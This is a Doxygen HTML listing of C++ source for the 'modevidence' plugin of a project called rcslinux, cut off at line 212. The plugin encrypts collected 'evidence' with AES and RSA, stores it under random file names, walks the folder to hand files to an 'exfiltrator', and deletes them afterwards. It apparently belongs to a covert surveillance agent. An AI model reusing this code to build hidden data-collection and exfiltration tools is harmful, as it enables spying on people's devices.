<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.18"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>rcslinux: plugins/modevidence/CModEvidence.cpp Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
 <tbody>
 <tr style="height: 56px;">
  <td id="projectalign" style="padding-left: 0.5em;">
   <div id="projectname">rcslinux
   </div>
  </td>
 </tr>
 </tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.18 -->
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
var searchBox = new SearchBox("searchBox", "search",false,'Search');
/* @license-end */
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
$(function() {
  initMenu('',true,false,'search.php','Search');
  $(document).ready(function() { init_search(); });
});
/* @license-end */</script>
<div id="main-nav"></div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
     onmouseover="return searchBox.OnSearchSelectShow()"
     onmouseout="return searchBox.OnSearchSelectHide()"
     onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>

<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0" 
        name="MSearchResults" id="MSearchResults">
</iframe>
</div>

<div id="nav-path" class="navpath">
  <ul>
<li class="navelem"><a class="el" href="dir_38c8d24aef3972a7f87b834274e76e31.html">plugins</a></li><li class="navelem"><a class="el" href="dir_ebb1a4ffd9b1c72471af4c9a323738a3.html">modevidence</a></li>  </ul>
</div>
</div><!-- top -->
<div class="header">
  <div class="headertitle">
<div class="title">CModEvidence.cpp</div>  </div>
</div><!--header-->
<div class="contents">
<a href="CModEvidence_8cpp.html">Go to the documentation of this file.</a><div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno">    1</span>&#160;<span class="comment">//</span></div>
<div class="line"><a name="l00002"></a><span class="lineno">    2</span>&#160;<span class="comment">// Created by jrf/ht on 26/02/19.</span></div>
<div class="line"><a name="l00003"></a><span class="lineno">    3</span>&#160;<span class="comment">//</span></div>
<div class="line"><a name="l00004"></a><span class="lineno">    4</span>&#160; </div>
<div class="line"><a name="l00005"></a><span class="lineno">    5</span>&#160;<span class="preprocessor">#include &quot;<a class="code" href="CModEvidence_8h.html">CModEvidence.h</a>&quot;</span></div>
<div class="line"><a name="l00006"></a><span class="lineno">    6</span>&#160;<span class="preprocessor">#include &lt;<a class="code" href="bdutils_8h.html">bdutils.h</a>&gt;</span></div>
<div class="line"><a name="l00007"></a><span class="lineno">    7</span>&#160;<span class="preprocessor">#include &lt;<a class="code" href="ICore_8h.html">ICore.h</a>&gt;</span></div>
<div class="line"><a name="l00008"></a><span class="lineno">    8</span>&#160;<span class="preprocessor">#include &lt;inttypes.h&gt;</span></div>
<div class="line"><a name="l00009"></a><span class="lineno">    9</span>&#160; </div>
<div class="line"><a name="l00010"></a><span class="lineno">   10</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceBdUtils.html">BdUtils</a>;</div>
<div class="line"><a name="l00011"></a><span class="lineno">   11</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceAgentCore.html">AgentCore</a>;</div>
<div class="line"><a name="l00012"></a><span class="lineno">   12</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceAgentPlugin.html">AgentPlugin</a>;</div>
<div class="line"><a name="l00013"></a><span class="lineno">   13</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceAgentPluginPrivate.html">AgentPluginPrivate</a>;</div>
<div class="line"><a name="l00014"></a><span class="lineno">   14</span>&#160; </div>
<div class="line"><a name="l00015"></a><span class="lineno">   15</span>&#160;<span class="comment">// the plugin name</span></div>
<div class="line"><a name="l00016"></a><span class="lineno">   16</span>&#160;<span class="preprocessor">#define PLUGIN_NAME &quot;modevidence&quot;</span></div>
<div class="line"><a name="l00017"></a><span class="lineno"><a class="line" href="CModEvidence_8cpp.html#a0acf7475326cdcd31d690b72033de33a">   17</a></span>&#160; </div>
<div class="line"><a name="l00021"></a><span class="lineno"><a class="line" href="CModEvidence_8cpp.html#a059b25eae0c9691ffc03478bef362549">   21</a></span>&#160;<span class="keyword">extern</span> <span class="stringliteral">&quot;C&quot;</span> <a class="code" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a> *<a class="code" href="CModEvidence_8cpp.html#a059b25eae0c9691ffc03478bef362549">instance</a>() {</div>
<div class="line"><a name="l00022"></a><span class="lineno">   22</span>&#160;    <span class="keywordflow">if</span> (<a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a> == <span class="keyword">nullptr</span>) {</div>
<div class="line"><a name="l00023"></a><span class="lineno">   23</span>&#160;        <a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a> = <span class="keyword">new</span> <a class="code" href="classAgentPluginPrivate_1_1CModEvidence.html">CModEvidence</a>();</div>
<div class="line"><a name="l00024"></a><span class="lineno">   24</span>&#160;    }</div>
<div class="line"><a name="l00025"></a><span class="lineno">   25</span>&#160;    <span class="keywordflow">return</span> <a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a>;</div>
<div class="line"><a name="l00026"></a><span class="lineno">   26</span>&#160;}</div>
<div class="line"><a name="l00027"></a><span class="lineno">   27</span>&#160; </div>
<div class="line"><a name="l00028"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModEvidence.html#a5f488e9477b739ba4cc6610c65412456">   28</a></span>&#160;<span class="keywordtype">int</span> CModEvidence::start(<span class="keywordtype">void</span> *params) {</div>
<div class="line"><a name="l00029"></a><span class="lineno">   29</span>&#160;    <span class="keywordflow">if</span> (params == <span class="keyword">nullptr</span>) {</div>
<div class="line"><a name="l00030"></a><span class="lineno">   30</span>&#160;        <span class="comment">// modevidence needs the start parameters, it&#39;s an internal plugin only</span></div>
<div class="line"><a name="l00031"></a><span class="lineno">   31</span>&#160;        <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;modevidence needs the start parameter!&quot;</span>);</div>
<div class="line"><a name="l00032"></a><span class="lineno">   32</span>&#160;        <span class="keywordflow">return</span> EINVAL;</div>
<div class="line"><a name="l00033"></a><span class="lineno">   33</span>&#160;    }</div>
<div class="line"><a name="l00034"></a><span class="lineno">   34</span>&#160;    CPluginBase::start(params);</div>
<div class="line"><a name="l00035"></a><span class="lineno">   35</span>&#160; </div>
<div class="line"><a name="l00036"></a><span class="lineno">   36</span>&#160;    <span class="comment">// start is called with a pointer to EvidenceStartParams</span></div>
<div class="line"><a name="l00037"></a><span class="lineno">   37</span>&#160;    <span class="keywordtype">int</span> res = 0;</div>
<div class="line"><a name="l00038"></a><span class="lineno">   38</span>&#160;    <a class="code" href="structAgentCore_1_1__EvidenceStartParams.html">EvidenceStartParams</a>* startParams = (<a class="code" href="structAgentCore_1_1__EvidenceStartParams.html">EvidenceStartParams</a>*)params;</div>
<div class="line"><a name="l00039"></a><span class="lineno">   39</span>&#160;    <span class="keywordflow">switch</span> (startParams-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">mode</a>) {</div>
<div class="line"><a name="l00040"></a><span class="lineno">   40</span>&#160;        <span class="keywordflow">case</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#gaaaf16ceaea6174d1762d3639f4fd72d9">EVIDENCE_ADD</a>:</div>
<div class="line"><a name="l00041"></a><span class="lineno">   41</span>&#160;            <span class="comment">// add an evidence</span></div>
<div class="line"><a name="l00042"></a><span class="lineno">   42</span>&#160;            res = evidenceAddInternal((uint8_t*)startParams-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#ga20360a0574745e71136d9fef2da48f93">in</a>, startParams-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#ga48e7b89694845643759212d026351465">inSize</a>, &amp;startParams-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#gaf7722a418bb9513d53b5f63a1f45b660">evidencePath</a>, &amp;startParams-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#ga4fb8d399ac90102d087ca9412d29501c">out</a>, &amp;startParams-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#ga711f219c1a17aa2f9e18e994962d473e">outSize</a>);</div>
<div class="line"><a name="l00043"></a><span class="lineno">   43</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00044"></a><span class="lineno">   44</span>&#160;        <span class="keywordflow">case</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#ga9fd73bd75e66453d42897b6efacbb319">EVIDENCE_STORAGE_PATH</a>:</div>
<div class="line"><a name="l00045"></a><span class="lineno">   45</span>&#160;            <span class="comment">// get the evidence storage path location</span></div>
<div class="line"><a name="l00046"></a><span class="lineno">   46</span>&#160;            startParams-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#ga4d1a4cebd5a893bed7f7d741b71dbc29">storagePath</a> = _evdPath;</div>
<div class="line"><a name="l00047"></a><span class="lineno">   47</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00048"></a><span class="lineno">   48</span>&#160;        <span class="keywordflow">case</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#gabd852dd6e48372d695a19e827694ae1b">EVIDENCE_REMOVE</a>:</div>
<div class="line"><a name="l00049"></a><span class="lineno">   49</span>&#160;            <span class="comment">// remove an evidence (correctly exfiltrated)</span></div>
<div class="line"><a name="l00050"></a><span class="lineno">   50</span>&#160;            res = evidenceRemoveInternal((<span class="keyword">const</span> <span class="keywordtype">char</span>*)startParams-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#ga20360a0574745e71136d9fef2da48f93">in</a>);</div>
<div class="line"><a name="l00051"></a><span class="lineno">   51</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00052"></a><span class="lineno">   52</span>&#160;        <span class="keywordflow">case</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#ga9eb6e189e7295dc2ba2af6bda819f6dc">EVIDENCE_STORAGE_SIZE</a>:</div>
<div class="line"><a name="l00053"></a><span class="lineno">   53</span>&#160;            <span class="comment">// get evidence folder size</span></div>
<div class="line"><a name="l00054"></a><span class="lineno">   54</span>&#160;            uint64_t storageSize;</div>
<div class="line"><a name="l00055"></a><span class="lineno">   55</span>&#160;            evidenceStorageSize(&amp;storageSize);</div>
<div class="line"><a name="l00056"></a><span class="lineno">   56</span>&#160;            evidenceStorageSize(&amp;storageSize);</div>
<div class="line"><a name="l00057"></a><span class="lineno">   57</span>&#160;            startParams-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#ga339499d0b71034c8546bb66d25bd066d">storageSize</a> = storageSize;</div>
<div class="line"><a name="l00058"></a><span class="lineno">   58</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00059"></a><span class="lineno">   59</span>&#160;        <span class="keywordflow">case</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#gabf196e25206d836cd8e6cf3e8664ba94">EVIDENCE_WALK</a>:</div>
<div class="line"><a name="l00060"></a><span class="lineno">   60</span>&#160;            <span class="comment">// walk the evidence folder</span></div>
<div class="line"><a name="l00061"></a><span class="lineno">   61</span>&#160;            res = evidenceWalkInternal();</div>
<div class="line"><a name="l00062"></a><span class="lineno">   62</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00063"></a><span class="lineno">   63</span>&#160;        <span class="keywordflow">default</span>:</div>
<div class="line"><a name="l00064"></a><span class="lineno">   64</span>&#160;            <span class="comment">// invalid start parameter</span></div>
<div class="line"><a name="l00065"></a><span class="lineno">   65</span>&#160;            res = ECANCELED;</div>
<div class="line"><a name="l00066"></a><span class="lineno">   66</span>&#160;    }</div>
<div class="line"><a name="l00067"></a><span class="lineno">   67</span>&#160; </div>
<div class="line"><a name="l00068"></a><span class="lineno">   68</span>&#160;    <span class="comment">// done</span></div>
<div class="line"><a name="l00069"></a><span class="lineno">   69</span>&#160;    stop();</div>
<div class="line"><a name="l00070"></a><span class="lineno">   70</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00071"></a><span class="lineno">   71</span>&#160;}</div>
<div class="line"><a name="l00072"></a><span class="lineno">   72</span>&#160; </div>
<div class="line"><a name="l00082"></a><span class="lineno"><a class="line" href="CModEvidence_8cpp.html#a49b56d9416bb6da84f1ee61a93f5a53b">   82</a></span>&#160;<span class="keyword">static</span> <span class="keywordtype">int</span> <a class="code" href="CModEvidence_8cpp.html#a49b56d9416bb6da84f1ee61a93f5a53b">evidenceWalkCallback</a>(<span class="keyword">const</span> <span class="keywordtype">char</span>* path, <span class="keywordtype">void</span>* context, <span class="keywordtype">int</span> depth, <span class="keyword">struct</span> dirent* entry) {</div>
<div class="line"><a name="l00083"></a><span class="lineno">   83</span>&#160;    <a class="code" href="classAgentCore_1_1ICore.html">ICore</a>* core = (<a class="code" href="classAgentCore_1_1ICore.html">ICore</a>*)context;</div>
<div class="line"><a name="l00084"></a><span class="lineno">   84</span>&#160;    uint8_t* data = <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00085"></a><span class="lineno">   85</span>&#160;    <span class="keywordtype">size_t</span> size = 0;</div>
<div class="line"><a name="l00086"></a><span class="lineno">   86</span>&#160;    <span class="keywordtype">int</span> res = <a class="code" href="classBdUtils_1_1CFile.html#a8a9183c9ab66e257ee97561bccc8b7c5">CFile::toBuffer</a>(path,&amp;data,&amp;size);</div>
<div class="line"><a name="l00087"></a><span class="lineno">   87</span>&#160;    <span class="keywordflow">if</span> (res == 0) {</div>
<div class="line"><a name="l00088"></a><span class="lineno">   88</span>&#160;        <span class="comment">// call the evidence manager, which in turn will call the exfiltrator for this evidence</span></div>
<div class="line"><a name="l00089"></a><span class="lineno">   89</span>&#160;        <span class="comment">// this is called in the recurrent exfiltrator thread, which will free the path and data once done</span></div>
<div class="line"><a name="l00090"></a><span class="lineno">   90</span>&#160;        <span class="keywordtype">char</span>* p = <a class="code" href="classBdUtils_1_1CString.html#ad0d97b1b40fca18dee0788fb9fc36d7a">CString::dup</a>(path);</div>
<div class="line"><a name="l00091"></a><span class="lineno">   91</span>&#160;        core-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a8b9a299e9de7602159f6966e66444e9b">evdMgr</a>()-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#ga3c492d604cde635c9079a36db4045da3">exfiltrateEvidence</a>(p, data, size, <span class="keyword">false</span>);</div>
<div class="line"><a name="l00092"></a><span class="lineno">   92</span>&#160;    }</div>
<div class="line"><a name="l00093"></a><span class="lineno">   93</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00094"></a><span class="lineno">   94</span>&#160;}</div>
<div class="line"><a name="l00095"></a><span class="lineno">   95</span>&#160; </div>
<div class="line"><a name="l00100"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModEvidence.html#a28caebee9020da7a90c7e4962383c7d6">  100</a></span>&#160;<span class="keywordtype">int</span> CModEvidence::evidenceWalkInternal() {</div>
<div class="line"><a name="l00101"></a><span class="lineno">  101</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00102"></a><span class="lineno">  102</span>&#160;    <span class="comment">// walk the evidence folder and call the callback for each</span></div>
<div class="line"><a name="l00103"></a><span class="lineno">  103</span>&#160;    <span class="keywordtype">int</span> res = <a class="code" href="classBdUtils_1_1CFile.html#aa54396a8e24a19170a67012cd32362ec">CFile::walkDir</a>(_evdPath, <a class="code" href="CModEvidence_8cpp.html#a49b56d9416bb6da84f1ee61a93f5a53b">evidenceWalkCallback</a>, _core, <span class="keyword">false</span>);</div>
<div class="line"><a name="l00104"></a><span class="lineno">  104</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00105"></a><span class="lineno">  105</span>&#160;}</div>
<div class="line"><a name="l00106"></a><span class="lineno">  106</span>&#160; </div>
<div class="line"><a name="l00117"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModEvidence.html#a158ee585fc5b5906ffd991ac6cc4d296">  117</a></span>&#160;<span class="keywordtype">int</span> CModEvidence::evidenceAddInternal(uint8_t *data, <span class="keywordtype">int</span> size, <span class="keywordtype">char</span>** path, uint8_t** out, <span class="keywordtype">size_t</span>* outSize) {</div>
<div class="line"><a name="l00118"></a><span class="lineno">  118</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00119"></a><span class="lineno">  119</span>&#160;    <span class="keywordflow">if</span> (!data || !size || !path || !out || !outSize) {</div>
<div class="line"><a name="l00120"></a><span class="lineno">  120</span>&#160;        <span class="keywordflow">return</span> EINVAL;</div>
<div class="line"><a name="l00121"></a><span class="lineno">  121</span>&#160;    }</div>
<div class="line"><a name="l00122"></a><span class="lineno">  122</span>&#160;    *out = <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00123"></a><span class="lineno">  123</span>&#160;    *outSize = 0;</div>
<div class="line"><a name="l00124"></a><span class="lineno">  124</span>&#160;    <span class="keywordtype">int</span> res = 0;</div>
<div class="line"><a name="l00125"></a><span class="lineno">  125</span>&#160;    uint8_t* compressed = <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00126"></a><span class="lineno">  126</span>&#160;    <span class="keywordtype">size_t</span> compressedSize = 0;</div>
<div class="line"><a name="l00127"></a><span class="lineno">  127</span>&#160;    <span class="keywordtype">char</span>* evdFilePath = <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00128"></a><span class="lineno">  128</span>&#160;    uint8_t* rsaBuf = <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00129"></a><span class="lineno">  129</span>&#160;    <span class="keywordtype">size_t</span> sizeRsaBuf = 0;</div>
<div class="line"><a name="l00130"></a><span class="lineno">  130</span>&#160;    <span class="keywordflow">do</span> {</div>
<div class="line"><a name="l00131"></a><span class="lineno">  131</span>&#160;        <span class="comment">// calculate an AES256 key and iv (32+16=48 random bytes), protect with rsa</span></div>
<div class="line"><a name="l00132"></a><span class="lineno">  132</span>&#160;        uint8_t keyIv[32 + 16];</div>
<div class="line"><a name="l00133"></a><span class="lineno">  133</span>&#160;        rng()-&gt;randBytes(keyIv,<span class="keyword">sizeof</span>(keyIv));</div>
<div class="line"><a name="l00134"></a><span class="lineno">  134</span>&#160;        uint8_t k[32]={0};</div>
<div class="line"><a name="l00135"></a><span class="lineno">  135</span>&#160;        uint8_t iv[16]={0};</div>
<div class="line"><a name="l00136"></a><span class="lineno">  136</span>&#160;        memcpy(k, keyIv, 32);</div>
<div class="line"><a name="l00137"></a><span class="lineno">  137</span>&#160;        memcpy(iv, keyIv+32, 16);</div>
<div class="line"><a name="l00138"></a><span class="lineno">  138</span>&#160;        _rsa-&gt;encrypt(keyIv,<span class="keyword">sizeof</span>(keyIv),&amp;rsaBuf,&amp;sizeRsaBuf);</div>
<div class="line"><a name="l00139"></a><span class="lineno">  139</span>&#160; </div>
<div class="line"><a name="l00140"></a><span class="lineno">  140</span>&#160;        <span class="comment">// compress/encrypt buffer</span></div>
<div class="line"><a name="l00141"></a><span class="lineno">  141</span>&#160;        res = <a class="code" href="classBdUtils_1_1CZLib.html#abcb096bb9867e846486c420b599c68e2">CZLib::compress</a>(data, size, &amp;compressed, &amp;compressedSize);</div>
<div class="line"><a name="l00142"></a><span class="lineno">  142</span>&#160;        <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00143"></a><span class="lineno">  143</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00144"></a><span class="lineno">  144</span>&#160;        }</div>
<div class="line"><a name="l00145"></a><span class="lineno">  145</span>&#160;        res = <a class="code" href="classBdUtils_1_1CAES.html#a974348e837aa79eda49537ee1e912bf7">CAES::encryptCtr</a>(k,256,iv,compressed,compressedSize,&amp;compressed);</div>
<div class="line"><a name="l00146"></a><span class="lineno">  146</span>&#160;        <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00147"></a><span class="lineno">  147</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00148"></a><span class="lineno">  148</span>&#160;        }</div>
<div class="line"><a name="l00149"></a><span class="lineno">  149</span>&#160; </div>
<div class="line"><a name="l00150"></a><span class="lineno">  150</span>&#160;        <span class="comment">// reallocate taking the rsa buffer into account</span></div>
<div class="line"><a name="l00151"></a><span class="lineno">  151</span>&#160;        uint8_t* tmp = (uint8_t*)<a class="code" href="classBdUtils_1_1CMemory.html#a99f1d1b790b0547916dea7b12923932b">CMemory::realloc</a>(compressed, compressedSize + sizeRsaBuf);</div>
<div class="line"><a name="l00152"></a><span class="lineno">  152</span>&#160;        <span class="keywordflow">if</span> (!tmp) {</div>
<div class="line"><a name="l00153"></a><span class="lineno">  153</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00154"></a><span class="lineno">  154</span>&#160;        }</div>
<div class="line"><a name="l00155"></a><span class="lineno">  155</span>&#160;        compressed = tmp;</div>
<div class="line"><a name="l00156"></a><span class="lineno">  156</span>&#160; </div>
<div class="line"><a name="l00157"></a><span class="lineno">  157</span>&#160;        <span class="comment">// and move/copy memory (rsabuf + compressed)</span></div>
<div class="line"><a name="l00158"></a><span class="lineno">  158</span>&#160;        <span class="comment">// size of the rsa buffer is always 256 for rsa2048</span></div>
<div class="line"><a name="l00159"></a><span class="lineno">  159</span>&#160;        memmove(compressed + sizeRsaBuf, compressed, compressedSize);</div>
<div class="line"><a name="l00160"></a><span class="lineno">  160</span>&#160;        memcpy(compressed, rsaBuf, sizeRsaBuf);</div>
<div class="line"><a name="l00161"></a><span class="lineno">  161</span>&#160;        uint32_t finalSize = compressedSize + sizeRsaBuf;</div>
<div class="line"><a name="l00162"></a><span class="lineno">  162</span>&#160; </div>
<div class="line"><a name="l00163"></a><span class="lineno">  163</span>&#160;        <span class="comment">// check if we&#39;re into limits</span></div>
<div class="line"><a name="l00164"></a><span class="lineno">  164</span>&#160;        <span class="keywordflow">if</span> (_storageCurrentSize + finalSize &gt; _storageMax) {</div>
<div class="line"><a name="l00165"></a><span class="lineno">  165</span>&#160;            <span class="comment">// disable evidence collection</span></div>
<div class="line"><a name="l00166"></a><span class="lineno">  166</span>&#160;            _core-&gt;evdMgr()-&gt;enable(<span class="keyword">false</span>);</div>
<div class="line"><a name="l00167"></a><span class="lineno">  167</span>&#160;            res = EOVERFLOW;</div>
<div class="line"><a name="l00168"></a><span class="lineno">  168</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00169"></a><span class="lineno">  169</span>&#160;        }</div>
<div class="line"><a name="l00170"></a><span class="lineno">  170</span>&#160; </div>
<div class="line"><a name="l00171"></a><span class="lineno">  171</span>&#160;        <span class="comment">// get path to an evidence file for storage</span></div>
<div class="line"><a name="l00172"></a><span class="lineno">  172</span>&#160;        <span class="keywordtype">char</span> rndString[33] = {0};</div>
<div class="line"><a name="l00173"></a><span class="lineno">  173</span>&#160;        <a class="code" href="classBdUtils_1_1CString.html#add7f0bc7ecab7c304c22b50fed3064de">CString::randomString</a>(rng()-&gt;nextRand(8,16), rndString, <span class="keyword">sizeof</span>(rndString));</div>
<div class="line"><a name="l00174"></a><span class="lineno">  174</span>&#160;        <a class="code" href="classBdUtils_1_1CString.html#a2e6bfd3823dae2a7437edc3f2aafc482">CString::joinPath</a>(_evdPath, rndString, &amp;evdFilePath);</div>
<div class="line"><a name="l00175"></a><span class="lineno">  175</span>&#160; </div>
<div class="line"><a name="l00176"></a><span class="lineno">  176</span>&#160;        <span class="comment">// store file</span></div>
<div class="line"><a name="l00177"></a><span class="lineno">  177</span>&#160;        res = <a class="code" href="classBdUtils_1_1CFile.html#a70e2f11e844cfe5e83146e1474567649">CFile::fromBuffer</a>(evdFilePath, compressed, finalSize);</div>
<div class="line"><a name="l00178"></a><span class="lineno">  178</span>&#160;        <span class="keywordflow">if</span> (res == 0) {</div>
<div class="line"><a name="l00179"></a><span class="lineno">  179</span>&#160;            <span class="comment">// return values</span></div>
<div class="line"><a name="l00180"></a><span class="lineno">  180</span>&#160;            *path = evdFilePath;</div>
<div class="line"><a name="l00181"></a><span class="lineno">  181</span>&#160;            *out = compressed;</div>
<div class="line"><a name="l00182"></a><span class="lineno">  182</span>&#160;            *outSize = finalSize;</div>
<div class="line"><a name="l00183"></a><span class="lineno">  183</span>&#160;        }</div>
<div class="line"><a name="l00184"></a><span class="lineno">  184</span>&#160; </div>
<div class="line"><a name="l00185"></a><span class="lineno">  185</span>&#160;        <span class="comment">// add to storage space</span></div>
<div class="line"><a name="l00186"></a><span class="lineno">  186</span>&#160;        <a class="code" href="CMutex_8h.html#a945e98d6eab62f3906153938a8156e30">MUTEX_GUARD</a>(_lock.stdMutex());</div>
<div class="line"><a name="l00187"></a><span class="lineno">  187</span>&#160;        _storageCurrentSize += finalSize;</div>
<div class="line"><a name="l00188"></a><span class="lineno">  188</span>&#160;    } <span class="keywordflow">while</span> (0);</div>
<div class="line"><a name="l00189"></a><span class="lineno">  189</span>&#160;    <a class="code" href="classBdUtils_1_1CMemory.html#af8b22a82a2b076989d9c001b736cfbc5">CMemory::free</a>(rsaBuf);</div>
<div class="line"><a name="l00190"></a><span class="lineno">  190</span>&#160; </div>
<div class="line"><a name="l00191"></a><span class="lineno">  191</span>&#160;    <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00192"></a><span class="lineno">  192</span>&#160;        <span class="comment">// free any allocated memory</span></div>
<div class="line"><a name="l00193"></a><span class="lineno">  193</span>&#160;        <a class="code" href="classBdUtils_1_1CMemory.html#af8b22a82a2b076989d9c001b736cfbc5">CMemory::free</a>(compressed);</div>
<div class="line"><a name="l00194"></a><span class="lineno">  194</span>&#160;        <a class="code" href="classBdUtils_1_1CMemory.html#af8b22a82a2b076989d9c001b736cfbc5">CMemory::free</a>(evdFilePath);</div>
<div class="line"><a name="l00195"></a><span class="lineno">  195</span>&#160;    }</div>
<div class="line"><a name="l00196"></a><span class="lineno">  196</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00197"></a><span class="lineno">  197</span>&#160;}</div>
<div class="line"><a name="l00198"></a><span class="lineno">  198</span>&#160; </div>
<div class="line"><a name="l00199"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModEvidence.html#a2b329e35b5eebdaad382c124fa10d7f7">  199</a></span>&#160;<span class="keywordtype">int</span> CModEvidence::evidenceRemoveInternal(<span class="keyword">const</span> <span class="keywordtype">char</span>* path) {</div>
<div class="line"><a name="l00200"></a><span class="lineno">  200</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00201"></a><span class="lineno">  201</span>&#160; </div>
<div class="line"><a name="l00202"></a><span class="lineno">  202</span>&#160;    <span class="comment">// get file size</span></div>
<div class="line"><a name="l00203"></a><span class="lineno">  203</span>&#160;    uint64_t s;</div>
<div class="line"><a name="l00204"></a><span class="lineno">  204</span>&#160;    <a class="code" href="classBdUtils_1_1CFile.html#a70d61f1b302c3b42175434a07c4bb4e9">CFile::size</a>(path, &amp;s);</div>
<div class="line"><a name="l00205"></a><span class="lineno">  205</span>&#160; </div>
<div class="line"><a name="l00206"></a><span class="lineno">  206</span>&#160;    <span class="comment">// remove file</span></div>
<div class="line"><a name="l00207"></a><span class="lineno">  207</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="stringliteral">&quot;removing evidence: %s, size=%&quot;</span> PRId64, path, s);</div>
<div class="line"><a name="l00208"></a><span class="lineno">  208</span>&#160;    <span class="keywordflow">if</span> (<a class="code" href="classBdUtils_1_1CFile.html#a401c3336849d580b8f25171da74a6b3b">CFile::remove</a>(path) == 0) {</div>
<div class="line"><a name="l00209"></a><span class="lineno">  209</span>&#160;        <a class="code" href="CMutex_8h.html#a945e98d6eab62f3906153938a8156e30">MUTEX_GUARD</a>(_lock.stdMutex());</div>
<div class="line"><a name="l00210"></a><span class="lineno">  210</span>&#160;        _storageCurrentSize -= s;</div>
<div class="line"><a name="l00211"></a><span class="lineno">  211</span>&#160;    }</div>
<div class="line"><a name="l00212"></a><span class="lineno">  212</span>&#160; </div>
